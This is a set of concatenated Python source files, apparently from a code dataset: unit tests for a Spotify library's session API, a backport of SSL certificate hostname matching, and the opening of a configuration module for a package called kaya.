lib_mock.sp_session_release.assert_called_with(sp_session)
def test_login_raises_error_if_no_password_and_no_blob(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
with self.assertRaises(AttributeError):
session.login('alice')
def test_login_with_password(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', 'secret')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, mock.ANY,
False, spotify.ffi.NULL)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][1]),
b'alice')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][2]),
b'secret')
def test_login_with_blob(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', blob='secret blob')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, spotify.ffi.NULL,
False, mock.ANY)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][1]),
b'alice')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][4]),
b'secret blob')
def test_login_with_remember_me_flag(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', 'secret', remember_me='anything truish')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, mock.ANY,
True, spotify.ffi.NULL)
def test_login_fail_raises_error(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.NO_SUCH_USER
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.login('alice', 'secret')
def test_logout(self, lib_mock):
lib_mock.sp_session_logout.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.logout()
lib_mock.sp_session_logout.assert_called_once_with(session._sp_session)
def test_logout_fail_raises_error(self, lib_mock):
lib_mock.sp_session_login.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.logout()
def test_remembered_user_name_grows_buffer_to_fit_username(self, lib_mock):
username = 'alice' * 100
lib_mock.sp_session_remembered_user.side_effect = (
tests.buffer_writer(username))
session = tests.create_real_session(lib_mock)
result = session.remembered_user_name
lib_mock.sp_session_remembered_user.assert_called_with(
session._sp_session, mock.ANY, mock.ANY)
self.assertEqual(result, username)
def test_remembered_user_name_is_none_if_not_remembered(self, lib_mock):
lib_mock.sp_session_remembered_user.return_value = -1
session = tests.create_real_session(lib_mock)
result = session.remembered_user_name
lib_mock.sp_session_remembered_user.assert_called_with(
session._sp_session, mock.ANY, mock.ANY)
self.assertIsNone(result)
def test_relogin(self, lib_mock):
lib_mock.sp_session_relogin.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.relogin()
lib_mock.sp_session_relogin.assert_called_once_with(
session._sp_session)
def test_relogin_fail_raises_error(self, lib_mock):
lib_mock.sp_session_relogin.return_value = (
spotify.ErrorType.NO_CREDENTIALS)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.relogin()
def test_forget_me(self, lib_mock):
lib_mock.sp_session_forget_me.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.forget_me()
lib_mock.sp_session_forget_me.assert_called_with(session._sp_session)
def test_forget_me_fail_raises_error(self, lib_mock):
lib_mock.sp_session_forget_me.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.forget_me()
@mock.patch('spotify.user.lib', spec=spotify.lib)
def test_user(self, user_lib_mock, lib_mock):
lib_mock.sp_session_user.return_value = (
spotify.ffi.cast('sp_user *', 42))
session = tests.create_real_session(lib_mock)
result = session.user
lib_mock.sp_session_user.assert_called_with(session._sp_session)
self.assertIsInstance(result, spotify.User)
def test_user_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_user.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.user
lib_mock.sp_session_user.assert_called_with(session._sp_session)
self.assertIsNone(result)
def test_user_name(self, lib_mock):
lib_mock.sp_session_user_name.return_value = spotify.ffi.new(
'char[]', b'alice')
session = tests.create_real_session(lib_mock)
result = session.user_name
lib_mock.sp_session_user_name.assert_called_with(session._sp_session)
self.assertEqual(result, 'alice')
def test_user_country(self, lib_mock):
lib_mock.sp_session_user_country.return_value = (
ord('S') << 8 | ord('E'))
session = tests.create_real_session(lib_mock)
result = session.user_country
lib_mock.sp_session_user_country.assert_called_with(
session._sp_session)
self.assertEqual(result, 'SE')
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_playlist_container(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = (
spotify.ffi.cast('sp_playlistcontainer *', 42))
session = tests.create_real_session(lib_mock)
result = session.playlist_container
lib_mock.sp_session_playlistcontainer.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.PlaylistContainer)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_playlist_container_if_already_listened_to(
self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = (
spotify.ffi.cast('sp_playlistcontainer *', 42))
session = tests.create_real_session(lib_mock)
result1 = session.playlist_container
result1.on(
spotify.PlaylistContainerEvent.PLAYLIST_ADDED, lambda *args: None)
result2 = session.playlist_container
result1.off()
self.assertIsInstance(result1, spotify.PlaylistContainer)
self.assertIs(result1, result2)
def test_playlist_container_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.playlist_container
lib_mock.sp_session_playlistcontainer.assert_called_with(
session._sp_session)
self.assertIsNone(result)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_inbox(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_inbox_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.inbox
lib_mock.sp_session_inbox_create.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
def test_inbox_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_inbox_create.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.inbox
lib_mock.sp_session_inbox_create.assert_called_with(
session._sp_session)
self.assertIsNone(result)
def test_set_cache_size(self, lib_mock):
lib_mock.sp_session_set_cache_size.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.set_cache_size(100)
lib_mock.sp_session_set_cache_size.assert_called_once_with(
session._sp_session, 100)
def test_set_cache_size_fail_raises_error(self, lib_mock):
lib_mock.sp_session_set_cache_size.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.set_cache_size(100)
def test_flush_caches(self, lib_mock):
lib_mock.sp_session_flush_caches.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.flush_caches()
lib_mock.sp_session_flush_caches.assert_called_once_with(
session._sp_session)
def test_flush_caches_fail_raises_error(self, lib_mock):
lib_mock.sp_session_flush_caches.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.flush_caches()
def test_preferred_bitrate(self, lib_mock):
lib_mock.sp_session_preferred_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_bitrate(spotify.Bitrate.BITRATE_320k)
lib_mock.sp_session_preferred_bitrate.assert_called_with(
session._sp_session, spotify.Bitrate.BITRATE_320k)
def test_preferred_bitrate_fail_raises_error(self, lib_mock):
lib_mock.sp_session_preferred_bitrate.return_value = (
spotify.ErrorType.INVALID_ARGUMENT)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.preferred_bitrate(17)
def test_preferred_offline_bitrate(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_offline_bitrate(spotify.Bitrate.BITRATE_320k)
lib_mock.sp_session_preferred_offline_bitrate.assert_called_with(
session._sp_session, spotify.Bitrate.BITRATE_320k, 0)
def test_preferred_offline_bitrate_with_allow_resync(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_offline_bitrate(
spotify.Bitrate.BITRATE_320k, allow_resync=True)
lib_mock.sp_session_preferred_offline_bitrate.assert_called_with(
session._sp_session, spotify.Bitrate.BITRATE_320k, 1)
def test_preferred_offline_bitrate_fail_raises_error(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.INVALID_ARGUMENT)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.preferred_offline_bitrate(17)
def test_get_volume_normalization(self, lib_mock):
lib_mock.sp_session_get_volume_normalization.return_value = 0
session = tests.create_real_session(lib_mock)
result = session.volume_normalization
lib_mock.sp_session_get_volume_normalization.assert_called_with(
session._sp_session)
self.assertFalse(result)
def test_set_volume_normalization(self, lib_mock):
lib_mock.sp_session_set_volume_normalization.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.volume_normalization = True
lib_mock.sp_session_set_volume_normalization.assert_called_with(
session._sp_session, 1)
def test_set_volume_normalization_fail_raises_error(self, lib_mock):
lib_mock.sp_session_set_volume_normalization.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.volume_normalization = True
def test_process_events_returns_ms_to_next_timeout(self, lib_mock):
def func(sp_session, int_ptr):
int_ptr[0] = 5500
return spotify.ErrorType.OK
lib_mock.sp_session_process_events.side_effect = func
session = tests.create_real_session(lib_mock)
timeout = session.process_events()
self.assertEqual(timeout, 5500)
def test_process_events_fail_raises_error(self, lib_mock):
lib_mock.sp_session_process_events.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.process_events()
@mock.patch('spotify.InboxPostResult', spec=spotify.InboxPostResult)
def test_inbox_post_tracks(self, inbox_mock, lib_mock):
session = tests.create_real_session(lib_mock)
inbox_instance_mock = inbox_mock.return_value
result = session.inbox_post_tracks(
mock.sentinel.username, mock.sentinel.tracks,
mock.sentinel.message, mock.sentinel.callback)
inbox_mock.assert_called_with(
session, mock.sentinel.username, mock.sentinel.tracks,
mock.sentinel.message, mock.sentinel.callback)
self.assertEqual(result, inbox_instance_mock)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_get_starred(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_starred_for_user_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.get_starred('alice')
lib_mock.sp_session_starred_for_user_create.assert_called_with(
session._sp_session, b'alice')
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_get_starred_for_current_user(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_starred_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.get_starred()
lib_mock.sp_session_starred_create.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
def test_get_starred_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_starred_for_user_create.return_value = (
spotify.ffi.NULL)
session = tests.create_real_session(lib_mock)
result = session.get_starred('alice')
lib_mock.sp_session_starred_for_user_create.assert_called_with(
session._sp_session, b'alice')
self.assertIsNone(result)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_get_published_playlists(self, playlist_lib_mock, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.cast('sp_playlistcontainer *', 42)
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists('alice')
func_mock.assert_called_with(session._sp_session, b'alice')
self.assertIsInstance(result, spotify.PlaylistContainer)
# Since we *created* the sp_playlistcontainer, we already have a
# refcount of 1 and shouldn't increase the refcount when wrapping this
# sp_playlistcontainer in a PlaylistContainer object
self.assertEqual(
playlist_lib_mock.sp_playlistcontainer_add_ref.call_count, 0)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_get_published_playlists_for_current_user(
self, playlist_lib_mock, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.cast('sp_playlistcontainer *', 42)
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists()
func_mock.assert_called_with(session._sp_session, spotify.ffi.NULL)
self.assertIsInstance(result, spotify.PlaylistContainer)
def test_get_published_playlists_if_not_logged_in(self, lib_mock):
func_mock = lib_mock.sp_session_publishedcontainer_for_user_create
func_mock.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.get_published_playlists('alice')
func_mock.assert_called_with(session._sp_session, b'alice')
self.assertIsNone(result)
@mock.patch('spotify.Link')
def test_get_link(self, link_mock, lib_mock):
session = tests.create_real_session(lib_mock)
link_mock.return_value = mock.sentinel.link
result = session.get_link('spotify:any:foo')
self.assertIs(result, mock.sentinel.link)
link_mock.assert_called_with(session, uri='spotify:any:foo')
@mock.patch('spotify.Track')
def test_get_track(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
track_mock.return_value = mock.sentinel.track
result = session.get_track('spotify:track:foo')
self.assertIs(result, mock.sentinel.track)
track_mock.assert_called_with(session, uri='spotify:track:foo')
@mock.patch('spotify.Track')
def test_get_local_track(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
sp_track = spotify.ffi.cast('sp_track *', 42)
lib_mock.sp_localtrack_create.return_value = sp_track
track_mock.return_value = mock.sentinel.track
track = session.get_local_track(
artist='foo', title='bar', album='baz', length=210000)
self.assertEqual(track, mock.sentinel.track)
lib_mock.sp_localtrack_create.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY, 210000)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][0]),
b'foo')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][1]),
b'bar')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][2]),
b'baz')
self.assertEqual(
lib_mock.sp_localtrack_create.call_args[0][3], 210000)
# Since we *created* the sp_track, we already have a refcount of 1 and
# shouldn't increase the refcount when wrapping this sp_track in a
# Track object
track_mock.assert_called_with(
session, sp_track=sp_track, add_ref=False)
@mock.patch('spotify.Track')
def test_get_local_track_with_defaults(self, track_mock, lib_mock):
session = tests.create_real_session(lib_mock)
sp_track = spotify.ffi.cast('sp_track *', 42)
lib_mock.sp_localtrack_create.return_value = sp_track
track_mock.return_value = mock.sentinel.track
track = session.get_local_track()
self.assertEqual(track, mock.sentinel.track)
lib_mock.sp_localtrack_create.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY, -1)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][0]),
b'')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][1]),
b'')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_localtrack_create.call_args[0][2]),
b'')
self.assertEqual(
lib_mock.sp_localtrack_create.call_args[0][3], -1)
# Since we *created* the sp_track, we already have a refcount of 1 and
# shouldn't increase the refcount when wrapping this sp_track in a
# Track object
track_mock.assert_called_with(
session, sp_track=sp_track, add_ref=False)
@mock.patch('spotify.Album')
def test_get_album(self, album_mock, lib_mock):
session = tests.create_real_session(lib_mock)
album_mock.return_value = mock.sentinel.album
result = session.get_album('spotify:album:foo')
self.assertIs(result, mock.sentinel.album)
album_mock.assert_called_with(session, uri='spotify:album:foo')
@mock.patch('spotify.Artist')
def test_get_artist(self, artist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
artist_mock.return_value = mock.sentinel.artist
result = session.get_artist('spotify:artist:foo')
self.assertIs(result, mock.sentinel.artist)
artist_mock.assert_called_with(session, uri='spotify:artist:foo')
@mock.patch('spotify.Playlist')
def test_get_playlist(self, playlist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
playlist_mock.return_value = mock.sentinel.playlist
result = session.get_playlist('spotify:playlist:foo')
self.assertIs(result, mock.sentinel.playlist)
playlist_mock.assert_called_with(session, uri='spotify:playlist:foo')
@mock.patch('spotify.User')
def test_get_user(self, user_mock, lib_mock):
session = tests.create_real_session(lib_mock)
user_mock.return_value = mock.sentinel.user
result = session.get_user('spotify:user:foo')
self.assertIs(result, mock.sentinel.user)
user_mock.assert_called_with(session, uri='spotify:user:foo')
@mock.patch('spotify.Image')
def test_get_image(self, image_mock, lib_mock):
session = tests.create_real_session(lib_mock)
callback = mock.Mock()
image_mock.return_value = mock.sentinel.image
result = session.get_image('spotify:image:foo', callback=callback)
self.assertIs(result, mock.sentinel.image)
image_mock.assert_called_with(
session, uri='spotify:image:foo', callback=callback)
@mock.patch('spotify.Search')
def test_search(self, search_mock, lib_mock):
session = tests.create_real_session(lib_mock)
search_mock.return_value = mock.sentinel.search
result = session.search('alice')
self.assertIs(result, mock.sentinel.search)
search_mock.assert_called_with(
session, query='alice', callback=None,
track_offset=0, track_count=20,
album_offset=0, album_count=20,
artist_offset=0, artist_count=20,
playlist_offset=0, playlist_count=20,
search_type=None)
@mock.patch('spotify.Toplist')
def test_toplist(self, toplist_mock, lib_mock):
session = tests.create_real_session(lib_mock)
toplist_mock.return_value = mock.sentinel.toplist
result = session.get_toplist(
type=spotify.ToplistType.TRACKS, region='NO')
self.assertIs(result, mock.sentinel.toplist)
toplist_mock.assert_called_with(
session, type=spotify.ToplistType.TRACKS, region='NO',
canonical_username=None, callback=None)
@mock.patch('spotify.session.lib', spec=spotify.lib)
class SessionCallbacksTest(unittest.TestCase):
def tearDown(self):
spotify._session_instance = None
def test_logged_in_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOGGED_IN, callback)
_SessionCallbacks.logged_in(
session._sp_session, int(spotify.ErrorType.BAD_API_VERSION))
callback.assert_called_once_with(
session, spotify.ErrorType.BAD_API_VERSION)
def test_logged_out_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOGGED_OUT, callback)
_SessionCallbacks.logged_out(session._sp_session)
callback.assert_called_once_with(session)
def test_metadata_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.METADATA_UPDATED, callback)
_SessionCallbacks.metadata_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_connection_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CONNECTION_ERROR, callback)
_SessionCallbacks.connection_error(
session._sp_session, int(spotify.ErrorType.OK))
callback.assert_called_once_with(session, spotify.ErrorType.OK)
def test_message_to_user_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.MESSAGE_TO_USER, callback)
data = spotify.ffi.new('char[]', b'a log message\n')
_SessionCallbacks.message_to_user(session._sp_session, data)
callback.assert_called_once_with(session, 'a log message')
def test_notify_main_thread_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.NOTIFY_MAIN_THREAD, callback)
_SessionCallbacks.notify_main_thread(session._sp_session)
callback.assert_called_once_with(session)
def test_music_delivery_callback(self, lib_mock):
sp_audioformat = spotify.ffi.new('sp_audioformat *')
sp_audioformat.channels = 2
audio_format = spotify.AudioFormat(sp_audioformat)
num_frames = 10
frames_size = audio_format.frame_size() * num_frames
frames = spotify.ffi.new('char[]', frames_size)
frames[0:3] = [b'a', b'b', b'c']
frames_void_ptr = spotify.ffi.cast('void *', frames)
callback = mock.Mock()
callback.return_value = num_frames
session = tests.create_real_session(lib_mock)
session.on('music_delivery', callback)
result = _SessionCallbacks.music_delivery(
session._sp_session, sp_audioformat, frames_void_ptr, num_frames)
callback.assert_called_once_with(
session, mock.ANY, mock.ANY, num_frames)
self.assertEqual(
callback.call_args[0][1]._sp_audioformat, sp_audioformat)
self.assertEqual(callback.call_args[0][2][:5], b'abc\x00\x00')
self.assertEqual(result, num_frames)
def test_music_delivery_without_callback_does_not_consume(self, lib_mock):
session = tests.create_real_session(lib_mock)
sp_audioformat = spotify.ffi.new('sp_audioformat *')
num_frames = 10
frames = spotify.ffi.new('char[]', 0)
frames_void_ptr = spotify.ffi.cast('void *', frames)
result = _SessionCallbacks.music_delivery(
session._sp_session, sp_audioformat, frames_void_ptr, num_frames)
self.assertEqual(result, 0)
def test_play_token_lost_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.PLAY_TOKEN_LOST, callback)
_SessionCallbacks.play_token_lost(session._sp_session)
callback.assert_called_once_with(session)
def test_log_message_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.LOG_MESSAGE, callback)
data = spotify.ffi.new('char[]', b'a log message\n')
_SessionCallbacks.log_message(session._sp_session, data)
callback.assert_called_once_with(session, 'a log message')
def test_end_of_track_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.END_OF_TRACK, callback)
_SessionCallbacks.end_of_track(session._sp_session)
callback.assert_called_once_with(session)
def test_streaming_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.STREAMING_ERROR, callback)
_SessionCallbacks.streaming_error(
session._sp_session, int(spotify.ErrorType.NO_STREAM_AVAILABLE))
callback.assert_called_once_with(
session, spotify.ErrorType.NO_STREAM_AVAILABLE)
def test_user_info_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.USER_INFO_UPDATED, callback)
_SessionCallbacks.user_info_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_start_playback_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.START_PLAYBACK, callback)
_SessionCallbacks.start_playback(session._sp_session)
callback.assert_called_once_with(session)
def test_stop_playback_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.STOP_PLAYBACK, callback)
_SessionCallbacks.stop_playback(session._sp_session)
callback.assert_called_once_with(session)
def test_get_audio_buffer_stats_callback(self, lib_mock):
callback = mock.Mock()
callback.return_value = spotify.AudioBufferStats(100, 5)
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.GET_AUDIO_BUFFER_STATS, callback)
sp_audio_buffer_stats = spotify.ffi.new('sp_audio_buffer_stats *')
_SessionCallbacks.get_audio_buffer_stats(
session._sp_session, sp_audio_buffer_stats)
callback.assert_called_once_with(session)
self.assertEqual(sp_audio_buffer_stats.samples, 100)
self.assertEqual(sp_audio_buffer_stats.stutter, 5)
def test_offline_status_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.OFFLINE_STATUS_UPDATED, callback)
_SessionCallbacks.offline_status_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_credentials_blob_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CREDENTIALS_BLOB_UPDATED, callback)
data = spotify.ffi.new('char[]', b'a credentials blob')
_SessionCallbacks.credentials_blob_updated(
session._sp_session, data)
callback.assert_called_once_with(session, b'a credentials blob')
def test_connection_state_updated_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.CONNECTION_STATE_UPDATED, callback)
_SessionCallbacks.connection_state_updated(session._sp_session)
callback.assert_called_once_with(session)
def test_scrobble_error_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.SCROBBLE_ERROR, callback)
_SessionCallbacks.scrobble_error(
session._sp_session, int(spotify.ErrorType.LASTFM_AUTH_ERROR))
callback.assert_called_once_with(
session, spotify.ErrorType.LASTFM_AUTH_ERROR)
def test_private_session_mode_changed_callback(self, lib_mock):
callback = mock.Mock()
session = tests.create_real_session(lib_mock)
session.on(spotify.SessionEvent.PRIVATE_SESSION_MODE_CHANGED, callback)
_SessionCallbacks.private_session_mode_changed(
session._sp_session, 1)
callback.assert_called_once_with(session, True)
|
jmptrader/rethinkdb
|
refs/heads/next
|
drivers/python/rethinkdb/backports/ssl_match_hostname/__init__.py
|
134
|
"""The match_hostname() function from Python 3.3.3, essential when using SSL."""
import re
__version__ = '3.4.0.2'
class CertificateError(ValueError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
# Ported from python3-syntax:
# leftmost, *remainder = dn.split(r'.')
parts = dn.split(r'.')
leftmost = parts[0]
remainder = parts[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survey of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
|
vivsh/kaya
|
refs/heads/master
|
src/kaya/env.py
|
1
|
from collections import Sequence
import os
import six
from six.moves.urllib import parse
import threading
from .assets import AssetManager
from .exceptions import TemplateNotFound, InvalidTag
try:
from lxml import etree as ET
except ImportError:
try:
from xml.etree import cElementTree as ET
except ImportError:
from xml.etree import ElementTree as ET
from werkzeug.utils import find_modules, import_string
class Config(object):
def __init__(self, kwargs):
self.data = {
"base_dir": os.getcwd(),
"static_url": "static/",
"static_dirs": [os.path.join(os.path.dirname(__file__), "static")],
"port": 8000,
"host": "127.0.0.1"
}
values = kwargs
for key in values:
method = "clean_%s" % key
try:
func = getattr(self, method)
except AttributeError:
if key in self.data:
self.data[key] = values[key]
else:
raise KeyError("%r is not a valid configuration key" % key)
else:
self.data[key] = func(values[key])
def abspath(self, *args):
return os.path.join(self.base_dir, *args)
def clean_static(self, value):
dirs = []
if not isinstance(value, (tuple, list)):
value = [value]
for val in value:
path = self.abspath(val)
if os.path.isdir(path):
dirs.append(path)
return dirs
def clean_static_url(self, value):
value = value.strip("/") + "/"
return value
def clean_port(self, value):
return int(value)
def clean_host(self, value):
return value
def dict(self):
return self.data.copy()
class Environment(object):
def __init__(self, **kwargs):
self.local = threading.local()
conf = Config(kwargs).dict()
self.base_dir = conf["base_dir"]
self.static_url = conf["static_url"]
self.static_dirs = conf["static_dirs"]
self.port = conf["port"]
self.host = conf["host"]
self.elements = {}
self.load_elements()
def load_modules(self):
for pkg in ("kaya.tags", ):
mods = find_modules(pkg)
for m in mods:
import_string(m, True)
def load_elements(self):
from kaya.tags.base import Element
